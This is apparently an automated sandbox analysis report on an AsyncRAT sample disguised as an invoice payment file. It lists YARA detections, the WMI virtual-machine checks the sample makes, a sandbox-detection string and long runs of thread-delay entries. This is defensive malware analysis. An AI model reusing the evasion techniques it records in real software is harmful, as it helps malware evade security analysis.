Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 7B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 8B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 8CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: A6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: B6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: C6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 1310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Memory allocated: 14A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 7710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 8710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 88B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 98B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: A290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: B290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 32A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Memory allocated: 52A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599433	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599208	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598967	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596723	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596345	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 596137	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595775	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Thread delayed: delay time: 594031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598882
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598542
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598187
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 598078
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597291
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597178
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596936
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596800
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595890
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595344
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594722
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594555
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594444
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Thread delayed: delay time: 594326

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7428	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2090	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Window / User API: threadDelayed 5038	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Window / User API: threadDelayed 4800	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Window / User API: threadDelayed 7400
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Window / User API: threadDelayed 2453

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 1816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599433s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599208s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598967s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598497s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596723s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596345s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -596137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595775s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe TID: 8000	Thread sleep time: -594938s >= -30000s	Jump to behavior
